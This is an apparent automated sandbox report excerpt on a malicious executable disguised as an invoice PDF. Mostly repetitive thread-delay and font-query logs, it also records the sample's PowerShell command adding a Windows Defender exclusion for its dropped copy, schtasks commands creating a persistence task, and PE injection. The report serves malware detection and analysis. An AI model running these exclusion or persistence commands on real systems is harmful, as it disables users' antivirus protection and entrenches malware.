                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeThread delayed: delay time: 596000Jump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeThread delayed: delay time: 595890Jump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeThread delayed: delay time: 595781Jump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeThread delayed: delay time: 595671Jump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeThread delayed: delay time: 595562Jump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeThread delayed: delay time: 595453Jump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeThread delayed: delay time: 595343Jump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeThread delayed: delay time: 595234Jump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeThread delayed: delay time: 595124Jump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeThread delayed: delay time: 595014Jump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeThread delayed: delay time: 594906Jump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeThread delayed: delay time: 594776Jump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeThread delayed: delay time: 594650Jump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeThread delayed: delay time: 594547Jump to behavior
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exeThread delayed: delay time: 922337203685477
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exeThread delayed: delay time: 600000
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exeThread delayed: delay time: 599875
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exeThread delayed: delay time: 599766
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exeThread delayed: delay time: 599641
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exeThread delayed: delay time: 599531
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exeThread delayed: delay time: 599422
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exeThread delayed: delay time: 599313
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exeThread delayed: delay time: 599188
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exeThread delayed: delay time: 599063
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exeThread delayed: delay time: 598938
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exeThread delayed: delay time: 598828
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exeThread delayed: delay time: 598715
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exeThread delayed: delay time: 598610
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exeThread delayed: delay time: 598448
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exeThread delayed: delay time: 598320
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exeThread delayed: delay time: 598219
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exeThread delayed: delay time: 598094
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exeThread delayed: delay time: 597983
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exeThread delayed: delay time: 597875
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exeThread delayed: delay time: 597766
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exeThread delayed: delay time: 597656
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exeThread delayed: delay time: 597543
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exeThread delayed: delay time: 597438
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exeThread delayed: delay time: 597313
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exeThread delayed: delay time: 597188
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exeThread delayed: delay time: 597078
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exeThread delayed: delay time: 596969
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exeThread delayed: delay time: 596844
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exeThread delayed: delay time: 596734
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exeThread delayed: delay time: 596625
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exeThread delayed: delay time: 596516
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exeThread delayed: delay time: 596406
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exeThread delayed: delay time: 596297
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exeThread delayed: delay time: 596188
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exeThread delayed: delay time: 596063
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exeThread delayed: delay time: 595953
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exeThread delayed: delay time: 595844
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exeThread delayed: delay time: 595719
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exeThread delayed: delay time: 595609
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exeThread delayed: delay time: 595500
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exeThread delayed: delay time: 595366
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exeThread delayed: delay time: 595250
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exeThread delayed: delay time: 595141
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exeThread delayed: delay time: 595030
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exeThread delayed: delay time: 594894
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exeThread delayed: delay time: 594780
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exeThread delayed: delay time: 594658
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exeThread delayed: delay time: 594532
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exeThread delayed: delay time: 594407
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exeThread delayed: delay time: 594282
                Source: Proforma Invoice_21-1541 And Packing List.pdf.exe, 00000000.00000002.1773845424.0000000006EE9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\
                Source: Proforma Invoice_21-1541 And Packing List.pdf.exe, 00000009.00000002.4176457203.0000000000A88000.00000004.00000020.00020000.00000000.sdmp, vrhZELiHpiub.exe, 0000000D.00000002.4176549696.0000000000EAF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeCode function: 9_2_06589328 LdrInitializeThunk,9_2_06589328
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeMemory allocated: page read and write | page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Adds a directory exclusion to Windows Defender
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\vrhZELiHpiub.exe"
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\vrhZELiHpiub.exe"Jump to behavior
                Injects a PE file into a foreign processes
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeMemory written: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exe base: 400000 value starts with: 4D5AJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\vrhZELiHpiub.exe"Jump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\vrhZELiHpiub" /XML "C:\Users\user\AppData\Local\Temp\tmp5F82.tmp"Jump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeProcess created: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exe "C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exe"Jump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeProcess created: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exe "C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exe"Jump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeProcess created: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exe "C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exe"Jump to behavior
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\vrhZELiHpiub" /XML "C:\Users\user\AppData\Local\Temp\tmp6EA5.tmp"Jump to behavior
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exeProcess created: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exe "C:\Users\user\AppData\Roaming\vrhZELiHpiub.exe"Jump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeQueries volume information: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exe VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeQueries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeQueries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeQueries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeQueries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
